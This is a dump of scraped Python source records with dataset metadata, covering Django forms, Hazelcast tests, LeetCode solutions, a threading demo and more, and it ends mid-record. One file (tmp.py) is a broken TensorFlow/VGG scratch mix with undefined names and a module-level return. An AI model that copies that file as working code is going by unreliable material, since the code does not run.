DailyReportForm(ModelForm):\n class Meta:\n model = DailyReport\n fields = ('user', 'header', 'create_time', 'report_content', 'assess', 'score')\n widgets = {\n 'report_content': RedactorWidget(editor_options={'lang': 'en','minHeight':300}),\n 'assess': RedactorWidget(editor_options={'lang': 'en','minHeight':200})\n }\n\n\nclass RegularMeetingFormSetHelper(FormHelper):\n def __init__(self, *args, **kwargs):\n super(RegularMeetingFormSetHelper, self).__init__(*args, **kwargs)\n self.form_tag = False\n\n self.layout = Layout(\n Div(\n Div('title', css_class='col-md-4'),\n Div('specker', css_class='col-md-4'),\n Div('participant', css_class='col-md-2'),\n Div('meeting_time', css_class='col-md-4'),\n Div('enclosure', css_class='col-md-2'),\n css_class='row'\n ),\n Div(\n Div('main_content', css_class='col-md-2'),\n css_class='row'\n ),\n Button('button', '删除', css_class='btn btn-outline-danger btn-block btn-delete'),\n Div(\n Div('DELETE'),\n css_class='row',\n hidden=\"true\"\n )\n )\n self.layout.extend(['user', 'id'])\n self.all().wrap_together(Div, css_class=REGULARMETTING_FORMS_PREFIX)\n\n\nclass RegularMeetingForm(ModelForm):\n class Meta:\n model = RegularMeeting\n exclude = ['user']\n widgets = {\n 'main_content': RedactorWidget(editor_options={'lang': 'en'})\n }\n\n\nclass StudentForm(ModelForm):\n class Meta:\n model = Student\n fields = ('sname', 'age', 'sex', 'sdept')\n\n def __init__(self, *args, **kwargs):\n super(StudentForm, self).__init__(*args, **kwargs)\n self.helper = FormHelper()\n self.helper.form_id = 'id_student'\n self.helper.form_method = 'POST'\n self.helper.layout = Layout(\n Div(\n Div('sname', css_class='col-xs-5'),\n Div('sdept', css_class='col-xs-5'),\n Div('age', css_class='col-xs-5'),\n Div('sex', css_class='col-xs-5'),\n css_class='form-group'\n ),\n Div(\n Div('age', css_class='col-xs-5'),\n Div('sex', css_class='col-xs-5'),\n css_class='form-group'\n ),\n )\n\n","sub_path":"employees/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":21412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"451460149","text":"import warnings\nwarnings.filterwarnings('ignore')\nfrom models.transform import transform_pr, transform_issues\n\n\n# create a csv of pull requests\npr = transform_pr()\npr.to_csv(\"./data/pull_requests.csv\", index=False)\n\n# create a csv of pull issues\nissues = transform_issues()\nissues.to_csv(\"./data/issues.csv\", index=False)\n","sub_path":"upwork-devs/moses-mugo/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"490010714","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport Pyro4\nimport socket\nfrom InterfaceGrafica import *\n\n# SERVIDOR DO SS\n\n@Pyro4.expose\nclass SupervisorioSR_SS:\n\n def setDirecao(self):\n raiz = Tk()\n grafico = InterfaceGrafica(raiz)\n return grafico.desenhar()\n\ndef get_ip():\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n try:\n # doesn't even have to be reachable\n s.connect(('10.255.255.255', 1))\n IP = s.getsockname()[0]\n except:\n IP = '127.0.0.1'\n finally:\n s.close()\n return IP\n\nns = Pyro4.locateNS(get_ip())\ndaemon = Pyro4.Daemon(get_ip())\nprint(get_ip())\nuri = daemon.register(SupervisorioSR_SS)\nns.register('serverSR-SS',uri)\nprint(uri)\ndaemon.requestLoop()\n","sub_path":"projetoRobo/antigo/SupervisorioSR_SS.py","file_name":"SupervisorioSR_SS.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"384931182","text":"import uuid\n\nfrom mock import patch\n\nfrom hazelcast import HazelcastClient\nfrom hazelcast.core import Address, MemberInfo, MemberVersion, EndpointQualifier, ProtocolType\nfrom hazelcast.errors import IllegalStateError, TargetDisconnectedError\nfrom tests.base import HazelcastTestCase\n\n_UNREACHABLE_ADDRESS = Address(\"192.168.0.1\", 5701)\n_MEMBER_VERSION = MemberVersion(5, 0, 0)\n_CLIENT_PUBLIC_ENDPOINT_QUALIFIER = EndpointQualifier(ProtocolType.CLIENT, \"public\")\n\n\nclass ConnectionManagerTranslateTest(HazelcastTestCase):\n\n rc = None\n cluster = None\n member = None\n\n @classmethod\n def setUpClass(cls):\n cls.rc = cls.create_rc()\n cls.cluster = cls.create_cluster(cls.rc, None)\n cls.member = cls.cluster.start_member()\n\n @classmethod\n def tearDownClass(cls):\n cls.rc.terminateCluster(cls.cluster.id)\n cls.rc.exit()\n\n def setUp(self):\n self.client = None\n\n def tearDown(self):\n if self.client:\n self.client.shutdown()\n\n def test_translate_is_used(self):\n # It shouldn't be able to connect to cluster using unreachable\n # public address.\n with self.assertRaises(IllegalStateError):\n with patch.object(\n HazelcastClient,\n \"_create_address_provider\",\n return_value=TestAddressProvider(True, self.member.address),\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n cluster_connect_timeout=1.0,\n connection_timeout=1.0,\n )\n\n def test_translate_is_not_used_when_getting_existing_connection(self):\n provider = TestAddressProvider(False, self.member.address)\n with patch.object(\n HazelcastClient,\n \"_create_address_provider\",\n return_value=provider,\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n )\n # If the translate is used for this, it would return\n # the unreachable address and the connection attempt\n # would fail.\n provider.should_translate = True\n conn_manager = self.client._connection_manager\n conn = conn_manager._get_or_connect_to_address(self.member.address).result()\n self.assertIsNotNone(conn)\n\n def test_translate_is_used_when_member_has_public_client_address(self):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n use_public_ip=True,\n )\n\n member = MemberInfo(\n _UNREACHABLE_ADDRESS,\n uuid.uuid4(),\n [],\n False,\n _MEMBER_VERSION,\n None,\n {\n _CLIENT_PUBLIC_ENDPOINT_QUALIFIER: self.member.address,\n },\n )\n conn_manager = self.client._connection_manager\n conn = conn_manager._get_or_connect_to_member(member).result()\n self.assertIsNotNone(conn)\n\n def test_translate_is_not_used_when_member_has_public_client_address_but_option_is_disabled(\n self,\n ):\n self.client = HazelcastClient(\n cluster_name=self.cluster.id,\n connection_timeout=1.0,\n use_public_ip=False,\n )\n\n member = MemberInfo(\n _UNREACHABLE_ADDRESS,\n uuid.uuid4(),\n [],\n False,\n _MEMBER_VERSION,\n None,\n {\n _CLIENT_PUBLIC_ENDPOINT_QUALIFIER: self.member.address,\n },\n )\n conn_manager = self.client._connection_manager\n\n with self.assertRaises(TargetDisconnectedError):\n conn_manager._get_or_connect_to_member(member).result()\n\n\nclass TestAddressProvider(object):\n def __init__(self, should_translate, member_address):\n self.should_translate = should_translate\n self.member_address = member_address\n\n def load_addresses(self):\n return [self.member_address], []\n\n def translate(self, address):\n if not self.should_translate:\n return address\n\n if address == self.member_address:\n return _UNREACHABLE_ADDRESS\n\n return None\n","sub_path":"tests/integration/connection_manager_translate_test.py","file_name":"connection_manager_translate_test.py","file_ext":"py","file_size_in_byte":4225,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"252895313","text":"import collections, heapq\n\n\nclass Solution(object):\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n let N be length or words\n\n O(N + klogN) time complexity\n O(N) space complexity\n\n https://leetcode.com/problems/top-k-frequent-words/solution/\n \"\"\"\n pq = [(-freq, word) for word, freq in collections.Counter(words).items()]\n heapq.heapify(pq)\n return [heapq.heappop(pq)[1] for _ in range(k)]\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n heapify words ordered by (-frequency, lexical_order)\n return first k entries from heap as result\n \"\"\"\n pq = [(-freq, word) for word, freq in collections.Counter(words).items()]\n heapq.heapify(pq)\n res = []\n for _ in range(k):\n _, w = heapq.heappop(pq)\n res.append(w)\n return res\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 45 ms\n\n return words ordered by (-frequency, lexical_order)\n\n create map word -> freq\n create a min heap of tuples (-frequency, lexical_order)\n add all map entries to heap\n\n return first k entries from heap as result\n \"\"\"\n m = collections.Counter(words)\n pq, res = [], []\n for word, freq in m.items():\n heapq.heappush(pq, (-freq, word))\n for _ in range(k):\n _, w = heapq.heappop(pq)\n res.append(w)\n return res\n\n def topKFrequent(self, words, k):\n \"\"\"\n :type words: List[str]\n :type k: int\n :rtype: List[str]\n\n ACE\n 50 ms\n\n Unfortunately, we cannot use -word like we can with numeric values\n So we implement a wrapper class which overrides the lt operator\n\n 1. Possible Improvement:\n\n we can use a max heap on (-frequency, lexical_order) to only keep k elements in heap\n add first k map entires to max heap\n for remaining map entries (f, w)\n if f < heap.peek.f or f == heap.peek.f and w < heap.peek.w\n add to heap and pop the max element\n finally remove the elements from heap in order, reverse the order, and return as result\n\n 2. Possible Improvement Accounting for no max heap in Python:\n\n we can use a min heap on (frequency, inverse_lexical_order_word, word) to only keep k elements in heap\n add first k map entires to max heap\n for remaining map entries (freq, word)\n if we find a greater frequency or lexically smaller word, then add to heap and pop max\n a lexically smaller word corresponds to a lexically greater InvertedWord\n if heap.peek.f < freq or heap.peek.f == freq and heap.peek.key < make_key(w)\n add to heap and pop the max element\n finally remove the elements from heap in order, reverse the order, and return as result\n \"\"\"\n m = collections.Counter(words)\n pq, res = [], []\n for word, freq in m.items():\n inverse = InvertedWord(word)\n if len(pq) < k:\n heapq.heappush(pq, (freq, inverse, word))\n else:\n f, inv, _ = pq[0]\n if f < freq or f == freq and inv < inverse:\n heapq.heappush(pq, (freq, inverse, word))\n heapq.heappop(pq)\n for _ in range(k):\n _, _, w = heapq.heappop(pq)\n res.append(w)\n return res[::-1]\n\n\nclass InvertedWord(object):\n def __init__(self, val):\n self.val = val\n def __lt__(self, other):\n return self.val > other.val\n\n\nif __name__ == '__main__':\n s = Solution()\n tests = [\n (\n [\"i\", \"love\", \"leetcode\", \"i\", \"love\", \"coding\"],\n 2,\n [\"i\", \"love\"]\n ),\n (\n [\"the\", \"day\", \"is\", \"sunny\", \"the\", \"the\", \"the\", \"sunny\", \"is\", \"is\"],\n 4,\n [\"the\", \"is\", \"sunny\", \"day\"]\n ),\n\n ]\n for words, k, exp in tests:\n res = s.topKFrequent(words, k)\n print(\"{} : {} -> {}\".format(words, k, res))\n assert res == exp","sub_path":"692_top_k_frequent_words.py","file_name":"692_top_k_frequent_words.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"356654216","text":"# -*- coding: utf-8 -*-\n# @Time : 2018\\12\\20 0020 14:31\n# @Author : 凯\n# @File : tmp.py\nimport tensorflow as tf\nwith tf.device(device_type): # <= This is optional\n n_input = 784\n n_output = 10\n weights = {\n 'wc1': tf.Variable(tf.random_normal([3, 3, 1, 64], stddev=0.1)),\n 'wd1': tf.Variable(tf.random_normal([14*14*64, n_output], stddev=0.1))\n }\n biases = {\n 'bc1': tf.Variable(tf.random_normal([64], stddev=0.1)),\n 'bd1': tf.Variable(tf.random_normal([n_output], stddev=0.1))\n }\n def conv_simple(_input, _w, _b):\n # Reshape input\n _input_r = tf.reshape(_input, shape=[-1, 28, 28, 1])\n # Convolution\n _conv1 = tf.nn.conv2d(_input_r, _w['wc1'], strides=[1, 1, 1, 1], padding='SAME')\n # Add-bias\n _conv2 = tf.nn.bias_add(_conv1, _b['bc1'])\n # Pass ReLu\n _conv3 = tf.nn.relu(_conv2)\n # Max-pooling\n _pool = tf.nn.max_pool(_conv3, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n # Vectorize\n _dense = tf.reshape(_pool, [-1, _w['wd1'].get_shape().as_list()[0]])\n # Fully-connected layer\n _out = tf.add(tf.matmul(_dense, _w['wd1']), _b['bd1'])\n # Return everything\n out = {\n 'input_r': _input_r, 'conv1': _conv1, 'conv2': _conv2, 'conv3': _conv3\n , 'pool': _pool, 'dense': _dense, 'out': _out\n }\n return out\nprint (\"CNN ready\")\n\nimport scipy.io\nimport numpy as np\nimport os\nimport scipy.misc\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\ncwd = os.getcwd()\nVGG_PATH = cwd + \"/data/imagenet-vgg-verydeep-19.mat\"\nCONTENT_PATH = cwd + \"/images/zly1.jpg\"\nCONTENT_LAYER = 'relu2_2'\nSTYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')\n# STYLE_LAYERS = ('relu1_1', 'relu2_1')\nraw_content = scipy.misc.imread(CONTENT_PATH)\n\n\ncontent_image = raw_content.astype(np.float)\ncontent_shape = (1,) + content_image.shape # (h, w, nch) => (1, h, w, nch)\nprint (\"Packages loaded\")\n\nimage = tf.placeholder('float', shape=content_shape)\nnets, content_mean_pixel, _ = net(VGG_PATH, image)\ndata_path = VGG_PATH\ninput_image = image\nlayers = (\n 'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n 'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n 'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n 'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n 'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n 'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n 'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n 'relu5_3', 'conv5_4', 'relu5_4'\n)\nlayer = data['layers']\nprint(\"layer.shape:\", layer.shape)\n# print(layer)输出是(1, 1),只有一个元素\nprint(\"layer[0].shape:\", layer[0].shape)\n# layer[0][0].shape: (1,),说明只有一个元素\nprint(\"layer[0][0].shape:\", layer[0][0].shape)\n\n# layer[0][0][0].shape: (1,),说明只有一个元素\nprint(\"layer[0][0][0].shape:\", layer[0][0][0].shape)\n# len(layer[0][0]):5,即weight(含有bias), pad(填充元素,无用), type, name, stride信息\nprint(\"len(layer[0][0][0]):\", len(layer[0][0][0]))\n# 所以应该能按照如下方式拿到信息,比如说name,输出为['conv1_1']\nprint(\"name:\", layer[0][0][0][3])\n# 查看一下weights的权重,输出(1,2),再次说明第一维是虚的,weights中包含了weight和bias\nprint(\"layer[0][0][0][0].shape\", layer[0][0][0][0].shape)\nprint(\"layer[0][0][0][0].len\", len(layer[0][0][0][0]))\n\n# weights[0].shape: (2,),weights[0].len: 2说明两个元素就是weight和bias\nprint(\"layer[0][0][0][0][0].shape:\", layer[0][0][0][0][0].shape)\nprint(\"layer[0][0][0][0].len:\", len(layer[0][0][0][0][0]))\n\nweights = layer[0][0][0][0][0]\n# 解析出weight和bias\nweight, bias = weights\n# weight.shape: (3, 3, 3, 64)\nprint(\"weight.shape:\", weight.shape)\n# bias.shape: (1, 64)\n\n\ndata = scipy.io.loadmat(data_path)\nmean = data['normalization'][0][0][0]\nmean_pixel = np.mean(mean, axis=(0, 1))\nweights = data['layers'][0]\nnet = {}\ncurrent = input_image\nfor i, name in enumerate(layers):\n kind = name[:4]\n if kind == 'conv':\n kernels, bias = weights[i][0][0][0][0]\n # matconvnet: weights are [width, height, in_channels, out_channels]\n # tensorflow: weights are [height, width, in_channels, out_channels]\n kernels = np.transpose(kernels, (1, 0, 2, 3))\n bias = bias.reshape(-1)\n current = _conv_layer(current, kernels, bias)\n elif kind == 'relu':\n current = tf.nn.relu(current)\n elif kind == 'pool':\n current = _pool_layer(current)\n net[name] = current\nassert len(net) == len(layers)\nreturn net, mean_pixel, layers\ndef _conv_layer(input, weights, bias):\n conv = tf.nn.conv2d(input, tf.constant(weights), strides=(1, 1, 1, 1),\n padding='SAME')\n return tf.nn.bias_add(conv, bias)\ndef _pool_layer(input):\n return tf.nn.max_pool(input, ksize=(1, 2, 2, 1), strides=(1, 2, 2, 1),\n padding='SAME')\ndef preprocess(image, mean_pixel):\n return image - mean_pixel\ndef unprocess(image, mean_pixel):\n return image + mean_pixel\ndef imread(path):\n return scipy.misc.imread(path).astype(np.float)\ndef imsave(path, img):\n img = np.clip(img, 0, 255).astype(np.uint8)\n scipy.misc.imsave(path, img)\nprint (\"Network for VGG ready\")\ncwd = os.getcwd()\nVGG_PATH = cwd + \"/data/imagenet-vgg-verydeep-19.mat\"\nCONTENT_PATH = cwd + \"/images/zly1.jpg\"\nCONTENT_LAYER = 'relu2_2'\nSTYLE_LAYERS = ('relu1_1', 'relu2_1', 'relu3_1', 'relu4_1', 'relu5_1')\n# STYLE_LAYERS = ('relu1_1', 'relu2_1')\n\nraw_content = scipy.misc.imread(CONTENT_PATH)\nplt.figure(0, figsize=(10, 5))\nplt.imshow(raw_content)\nplt.title(\"Original content image\")\nplt.show()\n\ncontent_image = raw_content.astype(np.float)\ncontent_shape = (1,) + content_image.shape # (h, w, nch) => (1, h, w, nch)\nwith tf.Graph().as_default(), tf.Session() as sess:\n image = tf.placeholder('float', shape=content_shape)\n nets, content_mean_pixel, _ = net(VGG_PATH, image)\n content_image_pre = np.array([preprocess(content_image, content_mean_pixel)])\n content_features = nets[CONTENT_LAYER].eval(feed_dict={image: content_image_pre})\n print (\" Type of 'features' is \", type(content_features))\n print (\" Shape of 'features' is %s\" % (content_features.shape,))\n # Plot response\n for i in range(5):\n plt.figure(i, figsize=(10, 5))\n plt.matshow(content_features[0, :, :, i], cmap=plt.cm.gray, fignum=i)\n plt.title(\"%d-layer content feature\" % (i))\n plt.colorbar()\n plt.show()","sub_path":"notebooks/tmp.py","file_name":"tmp.py","file_ext":"py","file_size_in_byte":6524,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"486414884","text":"from block import *\nimport os\nimport hashlib\nfrom logging import ERROR, WARN, INFO, DEBUG\n\nclass secure_hash(Block):\n def on_load(self, config):\n self.config = config\n self.add_port(\"input\", Port.PUSH, Port.UNNAMED, [\"url\"])\n self.add_port(\"output\", Port.PUSH, Port.UNNAMED, [\"url\", \"fingerprint\"])\n self.add_port(\"query\", Port.QUERY, Port.UNNAMED, [\"url\"])\n \n def hash(self, c):\n return hashlib.sha224(c).hexdigest()\n\n def get_hashes(self, log):\n data_urls = log[\"url\"]\n hash_list = [self.hash(BlockUtils.fetch_file_at_url(u, self.ip_address))\n for u in data_urls]\n return hash_list\n \n def recv_push(self, port, log):\n if log.log.has_key(\"token\"):\n self.log(INFO, self.id + \" got the finish token for directory \" + log.log[\"token\"][0])\n else:\n hashes = self.get_hashes(log.log)\n log.append_field(\"fingerprint\", hashes)\n\n self.push(\"output\", log)\n \n def recv_query(self, port_name, log):\n nl = Log()\n hashes = self.get_hashes(log)\n nl.set_log({\"fingerprint\": hashes})\n self.return_query_res(port_name, nl)\n","sub_path":"blox/secure_hash__1_0/b_secure_hash.py","file_name":"b_secure_hash.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"293657421","text":"\"\"\"\nCoordinate conversions with the kapteyn Python package.\n\nkapteyn.celestial is very feature-complete and has great docs.\nCheck this out:\n\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html#celestial.sky2sky\nhttp://www.astro.rug.nl/software/kapteyn/celestial.html#celestial.skyparser\n\nhttp://www.astro.rug.nl/software/kapteyn/celestialbackground.html\nhttp://www.astro.rug.nl/software/kapteyn/celestialbackground.html#composing-other-transformations\n\"\"\"\nimport numpy as np\nfrom kapteyn import celestial\n\n# Read in initial coordinates as J2000 coordinates\ninitial_coords = np.loadtxt('../initial_coords.txt')\n\ndef transform_to(skyout, tag):\n \"\"\"Convert the test input coordinates to a given output system and save to text file\"\"\"\n skyin = 'fk5'\n output = celestial.sky2sky(skyin, skyout, initial_coords[:,0], initial_coords[:,1])\n np.savetxt('coords_{tag}.txt'.format(tag=tag), output, fmt=\"%20.15f\")\n\ntransform_to(skyout='galactic', tag='galactic')\ntransform_to(skyout='fk4,J2000_OBS', tag='b1950')\ntransform_to(skyout='ecliptic,J2000', tag='ecliptic')\n","sub_path":"kapteyn/convert.py","file_name":"convert.py","file_ext":"py","file_size_in_byte":1127,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"195703546","text":"# personal discord embed for rex \n\n\nimport discord\n\n\nclass Rexembed:\n\n def __init__(self, title='', description='', colour='', thumbnail='', image='', footer=''):\n\n self.title = title\n self.description = description\n self.thumbnail = thumbnail\n self.image = image\n self.footer = footer\n colour = colour.lower()\n if colour == 'red':\n self.colour = discord.Colour.red()\n elif colour == 'green':\n self.colour = discord.Colour.green()\n elif colour == 'blue':\n self.colour = discord.Colour.blue()\n\n\n def normal_embed(self):\n rembed = discord.Embed(\n title = self.title,\n description = self.description,\n colour = self.colour,\n )\n \n rembed.set_thumbnail(url=self.thumbnail)\n rembed.set_image(url=self.image)\n rembed.set_footer(text=self.footer)\n\n return rembed","sub_path":"embed.py","file_name":"embed.py","file_ext":"py","file_size_in_byte":938,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"359598772","text":"# -*- coding: utf-8 -*-\n\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('eksport_pbn', '0007_auto_20160127_0836'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='plikeksportupbn',\n name='rodzaj_daty',\n field=models.SmallIntegerField(default=3, help_text=b'Jakie pole z dat\\xc4\\x85 b\\xc4\\x99dzie u\\xc5\\xbcywane do wybierania rekord\\xc3\\xb3w?', verbose_name=b'Rodzaj pola daty', choices=[(1, b'data utworzenia'), (2, b'data aktualizacji'), (3, b'data aktualizacji dla PBN')]),\n ),\n ]\n","sub_path":"src/eksport_pbn/migrations/0008_auto_20160802_2346.py","file_name":"0008_auto_20160802_2346.py","file_ext":"py","file_size_in_byte":615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"389295346","text":"#!/usr/bin/env python3 -tt\nimport getopt\nimport collections\nimport sys\nimport os\nimport logging\nfrom time import time, sleep\nfrom colorama import Fore\nfrom threading import Thread, Lock\n\n\n# used http://agiliq.com/blog/2013/09/understanding-threads-in-python/\n\nthread = 100\nloop = 10\nmutex = Lock()\nglobal_var = 0\nglobal_varLock = 0\nglobal_varMutex = 0\nglobal_varPeterson = 0\nlevel = []\nwaiting = []\n\nif __name__ == '__main__':\n\n try:\n opts, args = getopt.getopt(sys.argv[1:], 't:l:hmp', ['threads', 'loops',\n 'help', 'mutex', \n 'peterson'])\n\n\n except getopt.GetoptError:\n logging.error(\"Invalid argument\")\n sys.exit(1)\n\n\n class IncrementThread(Thread):\n def run(self):\n global global_var\n for i in range(loop):\n read_value = global_var\n sleep(0.00002)\n global_var = read_value + 1\n\n def race(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThread()\n threads.append(t)\n t.start()\n for t in threads:\n t.join\n global global_var\n cur = global_var\n exs = n_threads * n_loops\n return(exs, cur)\n\n class IncrementThreadLock(Thread):\n def run(self):\n global global_varLock\n for i in range(loop):\n global_varLock += 1\n\n\n def race_lock(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThreadLock()\n threads.append(t)\n t.start()\n for t in threads:\n t.join\n global global_varLock\n cur = global_varLock\n exs = n_threads * n_loops\n return(exs, cur)\n\n\n class IncrementThreadMutex(Thread):\n def run(self):\n global global_varMutex\n for i in range(loop):\n mutex.acquire()\n read_valueMu = global_varMutex\n global_varMutex = read_valueMu + 1\n mutex.release()\n\n def race_m(n_threads, n_loops):\n threads = []\n for i in range(n_threads):\n t = IncrementThreadMutex()\n threads.append(t)\n t.start()\n for t in threads:\n t.join\n global global_varMutex\n cur = global_varMutex\n exp = n_threads * n_loops\n return(exp, cur)\n \n class IncrementThreadPeterson(Thread):\n def run (self):\n global global_varPeterson\n for i in range(loop):\n read_value = global_varPeterson\n global_varPeterson = read_value + 1\n\n\n def race_p(n_threads, n_loops):\n global global_varPeterson\n for j in range(n_threads):\n level.append(0)\n waiting.append(0)\n\n for i in range(n_threads):\n for j in range(1, n_threads):\n level[i] = j\n waiting[j] = i\n for k in range(n_threads):\n if k == i:\n continue\n while waiting[j] == i and level[k] >= level[i]:\n sleep(0.00002)\n\n t = IncrementThreadPeterson()\n t.start()\n t.join\n level[i] = 0\n cur = global_varPeterson\n exp = n_threads * n_loops\n return(exp, cur)\n\n def helps():\n print(Fore.RED + \"-h / --help: help\\n\" +\n \"-t / --threads: number of threads which should created\" +\n \"(default = 100)\\n\" +\n \"-l / --loops: how often should the global variable be incremented\" +\n \" in the thread function\\n\" +\n \"-m / --mutex: saves the global variable with a mutex\\n\" +\n \"-p / --peterson: saves the global variable with a peterson Algorithmus\\n\" +\n Fore.RESET)\n return\n\n\n if (len(opts) == 0):\n helps()\n\n for opt, arg in opts:\n if(opt in ('-h', '--help')):\n helps()\n elif(opt in ('-t', '--threads')):\n thread = int(arg)\n elif(opt in ('-l', '--loops')):\n loop = int(arg)\n elif(opt in ('-m', '--mutex')):\n starttime = time()\n res_race_m = race_m(thread, loop)\n endtime = time()\n print(\"Mutex: After %s modifications, global_var should have become %s\" % (res_race_m[0], res_race_m[0]))\n print(\"Mutex: After %s modifications, global_var is %s\" % (res_race_m[0], res_race_m[1]))\n print(\"Performance: \" + Fore.RED + \"%s\" % str(endtime - starttime) + Fore.RESET)\n sys.exit()\n elif(opt in ('-p', '--peterson')):\n starttime = time()\n res_race_p = race_p(thread, loop)\n endtime = time()\n print(\"Peterson: After %s modifications, global_var should have become %s\" % (res_race_p[0], res_race_p[0]))\n print(\"Peterson: After %s modifications, global_var is %s\" % (res_race_p[0], res_race_p[1]))\n print(\"Performance: \" + Fore.RED + \"%s\" % str(endtime - starttime) + Fore.RESET)\n sys.exit()\n res_race = race(thread, loop)\n res_race_lock = race_lock(thread, loop)\n \n\n print(\"Race: After %s modifications, global_var should have become %s\" % (res_race[0], res_race[0]))\n print(\"Race: After %s modifications, global_var is %s\" % (res_race[0], res_race[1]))\n\n print(\"Race lock: After %s modifications, global_var should have become %s\" % (res_race_lock[0], res_race_lock[0]))\n print(\"Race lock: After %s modifications, global_var is %s\" % (res_race_lock[0], res_race_lock[1]))\n\n ","sub_path":"L3/racecondition.py","file_name":"racecondition.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"209322323","text":"from datetime import datetime \nimport json\nimport warnings\nfrom enum import Enum\n\n\ndef GetDate():\n return str(datetime.now().strftime('%d/%m/%Y %H:%M:%S'))\n\ndef GetTime():\n return str(datetime.now().strftime('%H:%M:%S'))\n\n\ndef InList(lstBuscar, conteudo):\n return any(x in conteudo for x in lstBuscar)\n\n\ndef InListAnyInS(lstBuscar, conteudo):\n if isinstance(conteudo, (list)):\n conteudoUpper = [x.upper() for x in conteudo]\n else:\n conteudoUpper = conteudo.upper()\n\n lstBuscarUpper = [x.upper() for x in lstBuscar]\n return any(x in conteudoUpper for x in lstBuscarUpper)\n\n\ndef InListAllInS(lstBuscar, conteudo):\n if isinstance(conteudo, (list)):\n conteudoUpper = [x.upper() for x in conteudo]\n else:\n conteudoUpper = conteudo.upper()\n\n lstBuscarUpper = [x.upper() for x in lstBuscar]\n return all(x in conteudoUpper for x in lstBuscarUpper)\n\n\nclass LogObj:\n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\nclass PostFeed(object):\n def __init__(self, titulo, tags, link, data, origem):\n self.titulo = titulo\n self.tags = tags\n self.link = str(link)\n self.data = data\n self.origem = origem\n self.criadoEm = GetDate()\n\n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\nclass TipoLink(Enum):\n Desconhecido = 'Desconhecido'\n AppStore = 'Apple Store (iOS)'\n Mac = 'Mac Store'\n PlayStore = 'Google Play Store (Android)'\n News = 'Notícias'\n Video = 'Vídeo'\n Crowdfunding = 'Crowdfunding'\n\n\nclass LinkObj(object):\n def __init__(self, fonte, texto, postUrl, link, tipoLink):\n self.fonte = fonte\n self.texto = texto\n self.postUrl = postUrl\n self.link = str(link)\n self.tipo = tipoLink.value\n self.criadoEm = GetDate()\n\n \n def toJSON(self):\n dumps = json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n return json.loads(dumps)\n\n\ndef DateTimeDiff(s1, s2):\n tdelta = s2 - s1\n tempoGasto = ''\n\n plural = '(s)' if tdelta.days > 1 else ''\n if tdelta.days > 0:\n tempoGasto += '{} dia{} '.format(tdelta.days, plural)\n\n hora = tdelta.seconds//3600\n plural = '(s)' if hora > 1 else ''\n if hora > 0: \n tempoGasto += '{} hora{} '.format(hora, plural)\n\n minutos = (tdelta.seconds//60)%60\n plural = '(s)' if minutos > 1 else ''\n if minutos > 0: \n tempoGasto += '{} minuto{} '.format(minutos, plural)\n\n tempoGasto += '{} seg'.format(tdelta.seconds)\n\n return tempoGasto","sub_path":"Classes.py","file_name":"Classes.py","file_ext":"py","file_size_in_byte":2716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"342983536","text":"from flask import Flask, render_template\nfrom flask import jsonify\nfrom flask_cors import CORS\nfrom flask import request\nimport requests\nimport os\nimport json\n\nos.environ['HTTP_PROXY'] = 